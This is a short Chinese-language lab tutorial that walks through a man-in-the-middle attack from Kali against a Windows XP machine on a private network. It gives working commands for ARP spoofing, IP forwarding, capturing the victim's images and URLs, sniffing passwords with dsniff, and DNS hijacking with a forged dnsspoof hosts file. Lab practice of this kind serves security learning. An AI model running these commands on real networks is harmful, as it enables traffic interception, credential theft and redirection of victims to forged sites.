準備:kali、xp
kali ip:192.168.14.157
目标ip:192.168.14.158
目标網關:192.168.14.2
ARP欺騙:
arpspoof -t 目标ip -r 目标網關
指令:arpspoof -i eth0 -t 192.168.14.158 -r 192.168.14.2
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiETPwJWZ3ZCMwcTP39zZuBnLuVzRjVXRE5ENVpmT5VEVOlHMp5UNFRVT4dGROVTRq5EerRUT0UERNlHMp5ENjpnTzEFVNZ3aE1ENFRUT5hTaORzY650MRRVT2NmMiNnSywEd5ITW110MaZHetlVdO1GT0UERNl3YXJGc5kHT20ESjBjUIF2Lc12bj5SYphXa5VWen5WY35iclN3Ztl2Lc9CX6MHc0RHaiojIsJye.png)
我們可以看到xp認為網關的MAC位址和KAli是一樣的
顯示我們欺騙成功
但現在xp是不能上網的
kali 預設不會開啟流量轉發
我們在xp下是不能上網的
打開流量轉發的功能:
檢視(預設kali沒有開啟流量轉發功能,值為0)
指令:cat /proc/sys/net/ipv4/ip_forward
預設值為0
開啟流量轉發
指令:echo 1 > /proc/sys/net/ipv4/ip_forward
我們回來看kali是否能上網
能上網
網絡嗅探
竊取浏覽中的圖檔:
指令:driftnet -i eth0
會打開一個視窗
我們去xp浏覽網站
再看看效果
可以看到浏覽過的網頁照片都在這裡顯示
還可以抓取聲音檔案
你也可以把圖檔放到一起,放到一個目錄下
建立目錄:
mkdir 目錄名
-例如 mkdir tempdir/
把抓的圖檔儲存到目錄:
-driftnet -i eth0 -a -d tempdir/ -s(聲音檔案)
抓傳輸過程浏覽的url:
指令:urlsnarf -i eth0
嗅探密碼:
指令:dsniff -i eth0 -m
DNS欺騙(域名劫持)
你也可以進行域名劫持,讓對方通路一個網站解析到不準确或者僞造的網站上
你需要自己配制欺騙的域名
本人沒有找到自帶的域名集
隻能自己編輯
格式:
僞造網站ip *.baidu.com
僞造網站ip *.google.com.hk
檢視:cat /usr/share/dsniff/dnsspoof.hosts
編輯:vi /usr/share/dsniff/dnsspoof.hosts
執行指令:dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts